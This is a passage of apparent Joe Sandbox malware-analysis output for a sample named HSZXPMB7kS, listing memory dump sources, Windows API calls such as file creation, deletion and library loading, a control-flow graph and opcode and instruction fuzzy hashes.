        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID: api-ms-
        • API String ID: 3177248105-2084034818
        • Opcode ID: 8b0008530d4e4213cc206743ca9f7601d5beedc7ffd7b17459aa214cfb877a36
        • Instruction ID: 513d34961bbac9907827bf25dbe1bc763f61646ea58a482dbf88131c1c03d84b
        • Opcode Fuzzy Hash: 8b0008530d4e4213cc206743ca9f7601d5beedc7ffd7b17459aa214cfb877a36
        • Instruction Fuzzy Hash: 82E04F74684308F7EF101BA1FC06B693F99AF20B66F140020FA4DAC8F0EB7299E19584

        Control-flow Graph
        control_flow_graph 895 12a9e5-12a9f1 896 12a9f3-12a9fb GetStdHandle 895->896 897 12a9fe-12aa15 ReadFile 895->897 896->897 898 12aa71 897->898 899 12aa17-12aa20 call 12ab1c 897->899 900 12aa74-12aa77 898->900 903 12aa22-12aa2a 899->903 904 12aa39-12aa3d 899->904 903->904 905 12aa2c 903->905 906 12aa4e-12aa52 904->906 907 12aa3f-12aa48 GetLastError 904->907 908 12aa2d-12aa37 call 12a9e5 905->908 910 12aa54-12aa5c 906->910 911 12aa6c-12aa6f 906->911 907->906 909 12aa4a-12aa4c 907->909 908->900 909->900 910->911 912 12aa5e-12aa67 GetLastError 910->912 911->900 912->911 914 12aa69-12aa6a 912->914 914->908
        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 0012A9F5
        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0012AA0D
        • GetLastError.KERNEL32 ref: 0012AA3F
        • GetLastError.KERNEL32 ref: 0012AA5E
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLast$FileHandleRead
        • String ID:
        • API String ID: 2244327787-0
        • Opcode ID: bebfbb784db43d05ce05962919f72aa83392d6b29ca4d45aad8b3402b6d588d2
        • Instruction ID: cbc265af8fce23eddcf943b764b8f1b9eff475e6213be100f6ee498c507dda5f
        • Instruction Fuzzy Hash: FB118231900224EBCF249F60FE046AE3BA9FF51365FA04626F91687190D7749EA4DB53
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0012EA30,00000000,00000000,?,0014BE8B,0012EA30,00000000,00000000,00000000,?,0014C088,00000006,FlsSetValue), ref: 0014BF16
        • GetLastError.KERNEL32(?,0014BE8B,0012EA30,00000000,00000000,00000000,?,0014C088,00000006,FlsSetValue,00158A00,FlsSetValue,00000000,00000364,?,0014A5D7), ref: 0014BF22
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0014BE8B,0012EA30,00000000,00000000,00000000,?,0014C088,00000006,FlsSetValue,00158A00,FlsSetValue,00000000), ref: 0014BF30
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 7b44e62d919ac5018b60d73c421ff4fe9c1cbcf67edf4f945635f53f10c7a06e
        • Instruction ID: 6f528fba2471adba168853545832b4ece917ff2179464ba56c1b8976f5d4c931
        • Instruction Fuzzy Hash: ED012B3231A333DBC7218B78AC84A577798AF157B67220620F91ED75A0D730D889CEE0
        APIs
        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0012E79B,00000001,?,?,?,00000000,001366B2,?,?,?), ref: 0012B22E
        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,001366B2,?,?,?,?,?,00136174,?), ref: 0012B275
        • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0012E79B,00000001,?,?), ref: 0012B2A1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileWrite$Handle
        • String ID:
        • API String ID: 4209713984-0
        • Opcode ID: d4315836d5a1856141b36470df76c9f1cbf7c4b826061340bf62233488c3cdc1
        • Instruction ID: 87127f8346106f9a73a0b0e0082d1f59bd07c3ac80e0114a2408b692079764a3
        • Instruction Fuzzy Hash: 2B31DF31209325EFDB04CF10E898BAF77A5FB80715F04451CF9916B290CB74A998CBA2
        APIs
          • Part of subcall function 0012D68B: _wcslen.LIBCMT ref: 0012D691
        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B569
        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B59C
        • GetLastError.KERNEL32(?,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B5B9
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateDirectory$ErrorLast_wcslen
        • String ID:
        • API String ID: 2260680371-0
        • Opcode ID: afe967379bf1080b6131eb92c4a2322acb286e45d7255e39f17683f9b6b9e520
        • Instruction ID: 8458922629351a2d004c1214698b4a6e2b85c35c9853a03952f5a48259e8fb7e
        • Instruction Fuzzy Hash: C701D871208270AAEF256B70BCC5BEE335C9F19785F144415FA02DE0D1EB64DAD287A1
        APIs
        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0014CA68
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Info
        • String ID:
        • API String ID: 1807457897-3916222277
        • Opcode ID: aaaca97bdb79731f87e8ec019236fb0a5aff93894dc4cc2a08c6f905effbef60
        • Instruction ID: 233c88a8866a1fb818b5c978ed3d83ace51e3a780ad8ea125e62f32e5eaeb6e0
        • Instruction Fuzzy Hash: AF413A7050528C9EDF26CF68CC85AF6BBA9DF15304F2404EDE58A87152E335AA458FA0
        APIs
        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 0014C18D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: String
        • String ID: LCMapStringEx
        • API String ID: 2568140703-3893581201
        • Opcode ID: dbbb5f946f6b71a86219898f20c5638364a31dedea0cbec74f5ee79e8aa9a59d
        • Instruction ID: 6a058c7527ae0acd61ed160da5355e83667eee222bd67fcfc876ad8d54bda2d1
        • Instruction Fuzzy Hash: C201D332541219FBDF129FA0DC01DEE7FA2EF08751F014515FE182A171CB7299B1AB90
        APIs
        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0014B71F), ref: 0014C105
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CountCriticalInitializeSectionSpin
        • String ID: InitializeCriticalSectionEx
        • API String ID: 2593887523-3084827643
        • Opcode ID: 5ce9044096dd1394f6f47bb5db910c21aa8a6f5d59a78875477f9cef96bc1812
        • Instruction ID: 7d5a56e6bb0d8bd56ea61feebcd6cfe471c119934789f6048cd9104ebcb49f8e
        • Instruction Fuzzy Hash: 9AF0B431A41218FBCF129F91DC02CAE7FA1DB28751F004015FD152B170CFB159919B90
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Alloc
        • String ID: FlsAlloc
        • API String ID: 2773662609-671089009
        • Opcode ID: 18226a07d474a27e00f87796594135c3b753e8ecf3b682d1be582f3ee015081a
        • Instruction ID: 65f911494a92595c5f21d295d1a967d281f5dfb86a9201ffedf020a620ce35d2
        • Instruction Fuzzy Hash: D1E05530A45318FBC201ABA09C0297E7B90CB98B22F410016FC087A660CF706D858ACA
        APIs
          • Part of subcall function 0014C96B: GetOEMCP.KERNEL32(00000000,?,?,0014CBF4,?), ref: 0014C996
        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0014CC39,?,00000000), ref: 0014CE14
        • GetCPInfo.KERNEL32(00000000,0014CC39,?,?,?,0014CC39,?,00000000), ref: 0014CE27
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CodeInfoPageValid
        • String ID:
        • API String ID: 546120528-0
        • Opcode ID: 55c3d81fd82be121c91bb60c937996a755d3c873a2deac1d140a923fe4d1ec77
        • Instruction ID: 96d7301870557725c31a824157270eaf002cad0a5a1de51f62b6e1a8fb5f7b39
        • Instruction Fuzzy Hash: 8E516471E02202AFDB658F75C880ABBBFE6EF41304F14446ED0969B172E7399946CBD0
        APIs
        • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,0012ACB0,?,?,00000000,?,?,00129C8B,?), ref: 0012AE3A
        • GetLastError.KERNEL32(?,?,00129C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0012AE49
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorFileLastPointer
        • String ID:
        • API String ID: 2976181284-0
        • Opcode ID: 190d03b06f103fb738cb1adb70be1c8bea43a07a61adc26877efd76806b32d3f
        • Instruction ID: c03ecf9cc97256007379e8f78a1f218d4bc8fa9ee40efc5059c8844b3ad97f19
        • Instruction Fuzzy Hash: 6841473520436DCFD728AFA4F8846BA73A5FF58322F900529E84687E51D770DCA58B93
        APIs
        • ShowWindow.USER32(00000000,00000005,?,?,?,?,0013A7F6,00000000,?), ref: 0013A699
        • SetWindowTextW.USER32(00000000,00000000), ref: 0013A6A3
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$ShowText
        • String ID:
        • API String ID: 1551406749-0
        • Opcode ID: 828543eb6dd5f06436d644df04c3bc7c9207ef508826b804cb59e298c6660a8b
        • Instruction ID: e3f6074e457a033db2981c5b5654e39cce551163f3f570d2085d51cc0922faad
        • Instruction Fuzzy Hash: 4D31AC71204726AFC700DF65EC8491ABBE9FF48704F09011EF6859B660CB71BC81CB92
        APIs
          • Part of subcall function 0014A505: GetLastError.KERNEL32(?,00163070,00145972,00163070,?,?,00145271,00000050,?,00163070,00000200), ref: 0014A509
          • Part of subcall function 0014A505: _free.LIBCMT ref: 0014A53C
          • Part of subcall function 0014A505: SetLastError.KERNEL32(00000000,?,00163070,00000200), ref: 0014A57D
          • Part of subcall function 0014A505: _abort.LIBCMT ref: 0014A583
          • Part of subcall function 0014CCFE: _abort.LIBCMT ref: 0014CD30
          • Part of subcall function 0014CCFE: _free.LIBCMT ref: 0014CD64
          • Part of subcall function 0014C96B: GetOEMCP.KERNEL32(00000000,?,?,0014CBF4,?), ref: 0014C996
        • _free.LIBCMT ref: 0014CC4F
        • _free.LIBCMT ref: 0014CC85
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorLast_abort
        • String ID:
        • API String ID: 2991157371-0
        • Opcode ID: 27f7b8cf3b9cd5cf7be34baa6e5f22fd843d59422522420c4574ab8a588e2b02
        • Instruction ID: fba1cc2061c8f157091ee6cfd591633c099ee392cdf1cc188bf663874f25ad2b
        • Instruction Fuzzy Hash: 61312931901104EFDB54DFA8D980B6EB7F5EF54321F2640ADE4089B2B1EB725D40DB90
        APIs
        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00127ED0,?,?,?,00000000), ref: 0012B04C
        • SetFileTime.KERNEL32(?,?,?,?), ref: 0012B100
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$BuffersFlushTime
        • String ID:
        • API String ID: 1392018926-0
        • Opcode ID: 4d32c80c67826fb18d95af08c08da7bd8a1bfdd3c9269233d04b4aefb5653227
        • Instruction ID: 0571cdb3d0de7fec024e9bb791a5593eab1bfc5c0e56e2efdcd01e6ea68080ed
        • Instruction Fuzzy Hash: DD21FD3124C351EFC716DE65E8D2AABBBF8AF95304F08491CF8E183181D329E91C9766
        APIs
        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0012B1B7,?,?,001281FD), ref: 0012A946
        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0012B1B7,?,?,001281FD), ref: 0012A976
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: e99847e7e4aed40555258fa76f7004e188ade76388767766a6f02e2a2333d0e7
        • Instruction ID: ed3fd9f2ad30c5e793a66d167eea02a1bc4c5413ae4e0acbe3bc9180079d1b03
        • Instruction Fuzzy Hash: 7221FFB1404354AFE7308A26DC88BB776DCEF59329F910A19FAD5C21C1C374A8C58672
        APIs
        • FreeLibrary.KERNEL32(00000000,?,001840C4,?,?,?,00144EE6,00000004,InitializeCriticalSectionEx,00157424,InitializeCriticalSectionEx,00000000,?,00144C9D,001840C4,00000FA0), ref: 00144D75
        • GetProcAddress.KERNEL32(00000000,?), ref: 00144D7F
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressFreeLibraryProc
        • String ID:
        • API String ID: 3013587201-0
        • Opcode ID: 9b4de947795375c8dbd42b2f429902e61307ab8908274d21b4863632ef8c3bf8
        • Instruction ID: 14150d1776e293fd5afc8fce66f5ee1f23a11120973f8e500111aea5f2fa3810
        • Instruction Fuzzy Hash: E811B635A00515DFCF26CFE4EC84A9A73A5FF667507250169E905DB264EB30DD41CBD0
        APIs
        • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 0012B157
        • GetLastError.KERNEL32 ref: 0012B164
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorFileLastPointer
        • String ID:
        • API String ID: 2976181284-0
        • Opcode ID: eef97b8949bef8e7536d411b0a2f556162e5ddffad0c88769c3e98162fc24f64
        • Instruction ID: aebd3d351170acd41051dcd5ea5be36b17d0fdeae81f1accd838938f0cbfa043
        • Instruction Fuzzy Hash: 0811E131604720EBE7298B28FC94BA7B3E9BB04360F604628E1A2935D0E770ED75C750
        APIs
        • _free.LIBCMT ref: 0014A6B5
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,001630C4,0012187A,?,?,00000007,?,?,?,001213F2,?,00000000), ref: 0014A6F1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Heap$AllocAllocate_free
        • String ID:
        • API String ID: 2447670028-0
        • Opcode ID: d387a5918bd4e39fd8f9b46f9d4098b86989421bf9d1ec200186348884ce02bc
        • Instruction ID: 998cbbd04e5d6ce43c434542629b4bc9ab17a33a6ee25040c0a7f33f091908b6
        • Instruction Fuzzy Hash: D3F0F632681111A7CB213A26AC00F6B37189FD1BB1F9B4016F8159A0B0DF30CC4195A7
        APIs
        • GetCurrentProcess.KERNEL32(?,?), ref: 001323C3
        • GetProcessAffinityMask.KERNEL32(00000000), ref: 001323CA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Process$AffinityCurrentMask
        • String ID:
        • API String ID: 1231390398-0
        • Opcode ID: 1fda615ea62c2ac1d4aeeba16928b7ae1e9555a514252f1c4f17cd235a3493ef
        • Instruction ID: 964c59f3a5bfa8f0d3e99aa6207247a3212db9d40c54fd23d79bad2ad87562a8
        • Opcode Fuzzy Hash: 1fda615ea62c2ac1d4aeeba16928b7ae1e9555a514252f1c4f17cd235a3493ef
        • Instruction Fuzzy Hash: 67E09233B00205A7CF0997A49C458EB72ECFB58209B248175E503D3500EA78DD4546A0
        APIs
        • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AttributesFile$_wcslen
        • String ID:
        • API String ID: 2673547680-0
        • Opcode ID: 64da1bbbed72b804d5ce748dcfd5ff0f5da3ba31f544da52540ad244dd567a70
        • Instruction ID: 7a83c583a293ae47ea9c66d84c4e1b85d9c412a77dc7f478ab2c056d27ca8fca
        • Opcode Fuzzy Hash: 64da1bbbed72b804d5ce748dcfd5ff0f5da3ba31f544da52540ad244dd567a70
        • Instruction Fuzzy Hash: 67F0ED31109229BBDF115FA0DC40BDE376CBF143CAF008061BA44DA1A0DB31DDE59BA0
        APIs
        • DeleteFileW.KERNEL32(?,00000000,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B481
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • DeleteFileW.KERNEL32(?,?,?,00000800,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B4AF
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DeleteFile$_wcslen
        • String ID:
        • API String ID: 2643169976-0
        • Opcode ID: 88ea2ef27fcd3e8906b7ea9f4e00af5a435b6e4bf7facf71c480229a9a1b9c5a
        • Instruction ID: 8c3d7f1e01b41a9a9887f279c95f3f34425cfee12ec161f6dcb4cb67fcdcc429
        • Opcode Fuzzy Hash: 88ea2ef27fcd3e8906b7ea9f4e00af5a435b6e4bf7facf71c480229a9a1b9c5a
        • Instruction Fuzzy Hash: 0DE06832504268ABEB006F60DC80FDE335CAF043C7F044022BE05C60A1EF30DCD49A50
        APIs
        • GdiplusShutdown.GDIPLUS(?,?,?,?,001537FF,000000FF), ref: 0013BDA5
        • CoUninitialize.COMBASE(?,?,?,?,001537FF,000000FF), ref: 0013BDAA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: GdiplusShutdownUninitialize
        • String ID:
        • API String ID: 3856339756-0
        • Opcode ID: 5b4f6a40d5d4728cb1f7e6624ef65ee8b013284c4b25ed87d29ad131e1b3187d
        • Instruction ID: 39b7f96ae26651b42036846272aaeef58a20225ceff7dadf0eb0d0bc585b9511
        • Opcode Fuzzy Hash: 5b4f6a40d5d4728cb1f7e6624ef65ee8b013284c4b25ed87d29ad131e1b3187d
        • Instruction Fuzzy Hash: 0AE06572504650EFC710DB48DC05B09FBA9FB88B24F04422AF42593B60CB746841CA90
        APIs
        • GetFileAttributesW.KERNEL32(?,?,?,0012B4CA,?,00128042,?), ref: 0012B4E4
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,0012B4CA,?,00128042,?), ref: 0012B510
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AttributesFile$_wcslen
        • String ID:
        • API String ID: 2673547680-0
        • Opcode ID: 0e707634ccd4fe1d267b4ad9f035eb036c6b06b3172261464e84a0cb32e63974
        • Instruction ID: 46b0c75184f65071939bbfd790edea9a5735e66c05fc222a5cc084be800d730c
        • Opcode Fuzzy Hash: 0e707634ccd4fe1d267b4ad9f035eb036c6b06b3172261464e84a0cb32e63974
        • Instruction Fuzzy Hash: 60E092325002786BCB20AB64EC04BDA775CAB193E6F000160FE45E71D1D770AD918AD0
        APIs
        • _swprintf.LIBCMT ref: 0013F01C
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • SetDlgItemTextW.USER32(00000065,?), ref: 0013F033
          • Part of subcall function 0013C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
          • Part of subcall function 0013C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
          • Part of subcall function 0013C748: IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
          • Part of subcall function 0013C748: TranslateMessage.USER32(?), ref: 0013C78C
          • Part of subcall function 0013C748: DispatchMessageW.USER32(?), ref: 0013C796
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
        • String ID:
        • API String ID: 3954729096-0
        • Opcode ID: f3bb6c8c9aa8efcf4d0b3f34bb97f9c9886ea14bff4ec75bb2900ad2ae3db0fc
        • Instruction ID: ee155a5f8223d1b5c15e04691020856682c8681768bb4f597e8140cc6530478a
        • Opcode Fuzzy Hash: f3bb6c8c9aa8efcf4d0b3f34bb97f9c9886ea14bff4ec75bb2900ad2ae3db0fc
